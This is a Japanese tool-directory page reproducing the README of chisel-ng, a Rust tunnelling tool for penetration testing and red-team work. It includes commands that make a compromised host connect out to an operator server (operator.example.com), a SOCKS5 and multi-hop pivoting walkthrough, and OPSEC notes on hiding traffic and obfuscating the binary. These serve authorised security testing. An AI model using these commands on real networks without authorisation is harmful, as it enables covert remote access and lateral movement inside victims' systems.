Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
chisel-ng — Chisel新世代、Rust製。WSS上のSSH、いくつかのカスタマイズ付き。 | Kitploit
ツール/GitHubGitHub/nullsection/chisel-ng
IDS/IPS回避横移動ポストエクスプロイトネットワークセキュリティペネトレーションテストコマンド&コントロールレッドチーミングリモートアクセスツール
GitHubnullsection/chisel-ng

chisel-ng

Chisel新世代、Rust製。WSS上のSSH、いくつかのカスタマイズ付き。

リポジトリを見る
13696ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

| | ()___ | | _ __ __ _ / | ' | / |/ _ \ || ' \ / ` | | (__| | | | _ \ / || | | | (| | _|| |||/_|| || ||_, | |___/

root@kitploit:~

# chisel-ng

![Rust](https://img.shields.io/badge/rust-1.70+-b7410e.svg)
![License](https://img.shields.io/badge/license-MIT-blue.svg)
![Windows](https://img.shields.io/badge/platform-windows-0078d4.svg)
![Linux](https://img.shields.io/badge/platform-linux-fcc624.svg)

ペネトレーションテストやレッドチームオペレーション向けの [chisel](https://github.com/jpillora/chisel) の Rust 実装です。SSH-over-WebSocket-over-TLS でリバーストンネルを確立し、通常の HTTPS トラフィックに紛れながら、侵害したホストを経由したピボットを可能にします。

---

## 目次

- [クイックスタート](#quick-start)
- [機能](#features)
- [アーキテクチャ](#architecture)
- [使用方法リファレンス](#usage-reference)
  - [サーバー(オペレーター)](#server-operator)
  - [リバースクライアント(エージェント)](#reverse-client-agent)
  - [バインドクライアント(エージェント - インバウンドモード)](#bind-client-agent---inbound-mode)
  - [サーバー CLI コマンド](#server-cli-commands)
- [マルチホップピボット](#multi-hop-pivoting)
- [技術詳細](#technical-details)
- [OPSEC 考慮事項](#opsec-considerations)
- [免責事項](#disclaimer)

---

## クイックスタート

### 必要条件

- Rust 1.70+ ([rustup.rs](https://rustup.rs/))

### ビルド

```bash
git clone https://github.com/nullsection/chisel-ng
cd chisel-ng
cargo build --release

バイナリは target/release/ に出力されます: chisel-server, chisel-client, chisel-bind-client

基本的な使い方

1. サーバーを起動(オペレーター):

root@kitploit:~
./chisel-server -p 'secret' -v

2. クライアントを実行(ターゲット):

root@kitploit:~
./chisel-client -s operator.example.com:8443 -p 'secret' -k

3. トンネルを作成:

root@kitploit:~
chisel-ng> session 1
[session-1] TARGET > tunnel 8080:192.168.1.100:80
[session-1] TARGET > socks5 1080

4. 内部サービスにアクセス:

root@kitploit:~
curl http://127.0.0.1:8080
curl --socks5 127.0.0.1:1080 http://internal.corp/

機能

  • SSH over WebSocket over TLS - 通常の HTTPS トラフィックに紛れる
  • 事前共有キー認証 - シンプルで安全な認証
  • 動的ポート転送 - オンデマンドでトンネルを作成
  • SOCKS5 プロキシ - エージェント経由の動的ルーティング
  • 2つのクライアントモード - リバース(外部接続)とバインド(インバウンド受け入れ)
  • クロスプラットフォーム - Windows と Linux

アーキテクチャ

root@kitploit:~
+------------------+              +----------------------------------+
|     オペレーター      |              |          ターゲットネットワーク          |
|                  |              |                                  |
| +--------------+ |     SSH      | +--------------+                 |
| |chisel-server |<---------------+-|chisel-client |                 |
| |    :8443     | |   (over TLS) | |  (reverse)   |                 |
| +--------------+ |              | +--------------+                 |
+------------------+              +----------------------------------+

プロトコルスタック:

root@kitploit:~
TCP -> TLS 1.3 -> WebSocket -> SSH -> トンネルデータ
                     ^
            HTTPS に見える

クライアントモード:

  • リバース (chisel-client) - サーバーにアウトバウンド接続
  • バインド (chisel-bind-client) - インバウンドを待ち受け; サーバーは connect コマンドを使用

使用方法リファレンス

サーバー(オペレーター)
root@kitploit:~
OPTIONS:
    -l, --listen <ADDR>      待ち受けアドレス [デフォルト: 0.0.0.0:8443]
    -p, --psk <PSK>          事前共有キーまたはパスフレーズ [env: CHISEL_PSK]
        --cert <FILE>        TLS 証明書 (PEM)
        --key <FILE>         TLS 秘密鍵 (PEM)
        --generate-psk       ランダムな PSK を生成して終了
    -v, --verbose            詳細出力
リバースクライアント(エージェント)
root@kitploit:~
OPTIONS:
    -s, --server <ADDR>      サーバーアドレス (host:port)
    -p, --psk <PSK>          事前共有キーまたはパスフレーズ [env: CHISEL_PSK]
    -u, --user <LABEL>       セッションラベル [デフォルト: agent]
    -k, --insecure           TLS 検証をスキップ
        --no-reconnect       自動再接続を無効化
    -i, --interval <SECS>    再接続間隔 [デフォルト: 30]
        --heartbeat <SECS>   ハートビート間隔 [デフォルト: 30]
    -v, --verbose            詳細出力
バインドクライアント(エージェント - インバウンドモード)

アウトバウンドを開始できずインバウンドを受け入れ可能なターゲット向け:

root@kitploit:~
OPTIONS:
    -l, --listen <ADDR>      待ち受けアドレス (例: 0.0.0.0:9000)
    -p, --psk <PSK>          事前共有キーまたはパスフレーズ [env: CHISEL_PSK]
    -u, --user <LABEL>       セッションラベル [デフォルト: agent]
    -k, --insecure           TLS 検証をスキップ
        --heartbeat <SECS>   ハートビート間隔 [デフォルト: 30]
    -v, --verbose            詳細出力
サーバー CLI コマンド

メインメニュー:

root@kitploit:~
sessions             接続中のセッション一覧
session <id>         セッションを選択
connect <ip:port>    バインドクライアントに接続
disconnect <id>      セッションを切断 (再接続する)
kill <id>            クライアントプロセスを強制終了

セッションメニュー:

root@kitploit:~
tunnel <local>:<target_ip>:<target_port>    トンネルを作成
tunnel --local <local>:<target>:<port>      トンネルを作成 (localhost のみ)
tunnel stop <port>                          トンネルを停止
tunnels                                      トンネル一覧
socks5 <port>                               SOCKS5 プロキシを起動
socks5 stop <port>                          SOCKS5 プロキシを停止
ping                                        レイテンシ測定
ps                                          リモートプロセス一覧
netstat                                     リモート接続一覧

マルチホップピボット

既存のセッションをチェーンして、隔離されたネットワークに到達します。

シナリオ: DMZホストはオペレーターに到達可能。内部ホスト (10.0.0.50) には DMZ からのみアクセス可能。

root@kitploit:~
+----------+        +-----------+        +------------+
| オペレーター |--SSH---| セッション1 |--TCP---| セッション2  |
|  サーバー  |        |   (DMZ)   |        | (内部)     |
+----------+        +-----------+        +------------+

手順 1 - サーバーを起動 (オペレーター):

root@kitploit:~
./chisel-server -p 'secret' -v

手順 2 - リバースクライアントを実行 (DMZホスト):

root@kitploit:~
./chisel-client -s operator.example.com:8443 -p 'secret' -k

手順 3 - バインドクライアントを実行 (内部ホスト 10.0.0.50):

root@kitploit:~
./chisel-bind-client -l 0.0.0.0:9000 -p 'secret' -k

手順 4 - トンネルを作成して接続 (サーバー CLI):

root@kitploit:~
chisel-ng> session 1
[session-1] DMZ > tunnel --local 9000:10.0.0.50:9000
Tunnel started on 127.0.0.1:9000

[session-1] DMZ > back
chisel-ng> connect 127.0.0.1:9000
Session 2 registered

chisel-ng> session 2
[session-2] INTERNAL > socks5 1080

技術詳細

トンネルの動作

トンネルを作成するとき (tunnel 8080:192.168.1.100:80):

  1. サーバーがローカルポート 8080 をバインド
  2. 接続時にサーバーがエージェントに CONNECT 要求を送信
  3. エージェントがターゲットに接続し、SSH direct-tcpip チャネルを開く
  4. データが双方向にブリッジされる
SOCKS5 の動作

RFC 1928 ハンドシェイクによる動的な宛先指定。正確なポートスキャン結果を得るために適切なエラーコードを返します。


OPSEC 考慮事項

バイナリ強化

リリースビルドは強化されています:

  • サイレント動作 - すべてのログはコンパイル時に no-op に
  • 文字列難読化 - プロトコル文字列はコンパイル時に XOR 暗号化
  • シンボル除去 - デバッグシンボルやソースパスはなし
  • サイズ最適化 - 約 3 MB (デバッグは約 15 MB)
  • パニック動作 - 即座にアボート、スタックトレースなし
運用セキュリティ
  • PSK認証 - パスフレーズ (SHA-256) または生の16進数から256ビットキー
  • 認証情報の保存なし - PSKは引数または環境変数のみ
  • 自動再接続 - デフォルトで有効、間隔設定可能
  • ハートビート - キープアライブ設定可能、--heartbeat 0 で無効化
検出ベクトル
  • JA3/JA4 TLS フィンガープリント
  • WebSocket アップグレードパターン
  • 長期間の接続持続時間
  • 一貫したハートビート間隔

免責事項

このツールは許可されたセキュリティテスト専用です。使用前に適切な許可を取得してください。作者は誤用について責任を負いません。


ライセンス

MIT

ツールをダウンロード